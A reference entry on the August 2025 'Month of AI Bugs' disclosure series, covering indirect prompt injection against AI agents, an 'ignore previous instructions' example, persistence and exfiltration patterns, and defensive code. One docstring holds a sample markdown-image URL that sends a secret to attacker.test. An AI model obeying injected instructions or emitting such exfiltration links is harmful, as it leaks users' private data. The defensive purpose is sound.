Month of AI Bugs (August 2025)

Summary

A coordinated disclosure series in August 2025, organized by Johann Rehberger (Embrace The Red) and modeled on the earlier-era “Month of Browser Bugs” / “Month of Bugs” tradition from offensive security. Over the calendar month, dozens of responsibly disclosed, successful attacks were cataloged against every frontier model and every major agentic development kit.

The series is significant not because any individual disclosure was novel in mechanism — most were indirect prompt injections leading to tool-abuse chains or data exfiltration — but because the breadth and consistency of the failures across vendors established that the agentic-AI security gap is structural, not vendor-specific.

The most-cited disclosure from the series is the Jules AI kill chain, a five-stage compromise of Google’s coding agent.

Why It Matters

The Month of AI Bugs reframed the agentic-AI security conversation in three ways:

  1. From “exists in the lab” to “exists in production.” Before August 2025, vendor security marketing could plausibly claim that frontier models had injection resistance “in production deployments.” The series demonstrated that vendor agent products were vulnerable in the same configurations customers were using.
  2. From “single-vendor problem” to “structural problem.” Failures appeared across Google, OpenAI, Anthropic, Microsoft, Meta, and major open-source frameworks. No vendor was clean. This shifted the framing from “Vendor X has a bug” to “the agentic-AI threat model has not been resolved by anyone.”
  3. From “research curiosity” to “responsible-disclosure infrastructure.” The series generated formal disclosures, CVE assignments where applicable, and vendor patches. It established a precedent that AI-agent vulnerabilities flow through the same disclosure channels as traditional security bugs.

Cross-Cutting Patterns From the Series

Drawing on Securing Your Agents (slides 13–14) and Rehberger’s public summaries:

  • Indirect injection dominated. Direct “ignore previous instructions” attempts were the minority. The high-impact disclosures used hidden injections in GitHub issues, calendar invites, web pages, document metadata, and email bodies.
  • Coding agents were over-represented as targets. They have file/network access, persistent state, and routinely ingest user-influenceable content (issues, PRs, READMEs, commit messages).
  • Persistence-in-agent was a recurring theme. Multiple disclosures showed attackers using the agent’s own write capabilities to embed payloads that survive session restarts.
  • No vendor had egress filtering by default. Outbound-network capability was a load-bearing element of nearly every exfiltration chain.
  • Markdown image rendering and URL-fetch side channels were a consistent exfiltration pattern across chat-style products.
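The markdown-image side channel in the last bullet works because rendering `![alt](url)` makes the client fetch `url`, so an injected payload can smuggle secrets out in the query string. One common mitigation is to sanitize rendered markdown against an image-host allowlist. A minimal sketch, assuming a hypothetical per-product allowlist (`ALLOWED_IMAGE_HOSTS` and the regex are illustrative, not any vendor’s implementation):

```python
import re
from urllib.parse import urlparse

# Hosts the renderer may fetch images from (assumption: a product-specific
# allowlist; any other host is a potential exfiltration channel).
ALLOWED_IMAGE_HOSTS = {"cdn.example-product.com"}

# Matches markdown images: ![alt](url ...), capturing alt text and URL.
MD_IMAGE = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)[^)]*\)")

def strip_exfil_images(markdown: str) -> str:
    """Drop markdown images whose URL points off-allowlist.

    An injected ![x](https://attacker.test/log?d=SECRET) would otherwise
    make the client issue a GET request carrying SECRET to the attacker.
    """
    def repl(match: re.Match) -> str:
        alt, url = match.group(1), match.group(2)
        host = urlparse(url).netloc.lower()
        if host in ALLOWED_IMAGE_HOSTS:
            return match.group(0)          # trusted host: render normally
        return f"[image removed: {alt}]"   # untrusted: URL is never fetched
    return MD_IMAGE.sub(repl, markdown)
```

The same idea generalizes to any auto-fetched URL (link previews, favicons): the fetch decision is made against an allowlist, not against the model’s output.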

Defensive Takeaways the Series Established

  1. Assume injection succeeds; design for containment. This became the default posture in subsequent enterprise agent-security writing (see Prompt Injection Containment for Agentic Systems).
  2. Egress filtering is non-optional for any agent that combines private-data access, untrusted-content exposure, and outbound communication (the Lethal Trifecta).
  3. Sandboxing is necessary, not paranoid. See Agent Sandboxing.
  4. Anomaly detection on tool-call sequences catches what input-layer detection misses. See Agent Observability.
  5. Coding agents need bespoke threat modeling distinct from chat-style agents.
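Takeaway 2 is usually implemented as a deny-by-default egress gate wrapped around every outbound request the agent’s tools make: even when an injection succeeds, the exfiltration leg of the chain is cut. A minimal sketch, assuming a hypothetical per-deployment allowlist (`EGRESS_ALLOWLIST`, `check_egress`, and `EgressDenied` are illustrative names):

```python
from urllib.parse import urlparse

# Deny-by-default egress policy: the agent may only reach hosts the
# operator has explicitly approved (assumption: a per-deployment list).
EGRESS_ALLOWLIST = {"api.github.com", "pypi.org"}

class EgressDenied(Exception):
    """Raised when a tool attempts an outbound request to an unapproved host."""

def check_egress(url: str) -> str:
    """Gate an outbound URL before any tool is allowed to fetch it.

    Containment-first: we assume the prompt injection already succeeded
    and block the data-exfiltration step instead.
    """
    # Normalize the host: strip userinfo ("user@host") and port ("host:443").
    host = urlparse(url).netloc.split("@")[-1].split(":")[0].lower()
    if host not in EGRESS_ALLOWLIST:
        raise EgressDenied(f"outbound request to {host!r} blocked by policy")
    return url
```

In practice the same check would sit in the tool runtime (HTTP client, git remote resolution, package installer) rather than in agent code, so the model cannot route around it.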

Sources

  • Primary aggregator: Johann Rehberger, Embrace The Red blog, August 2025 series.
  • Public summary referenced in: Securing Your Agents, Bill McIntyre, 2026 (slide 13).

See Also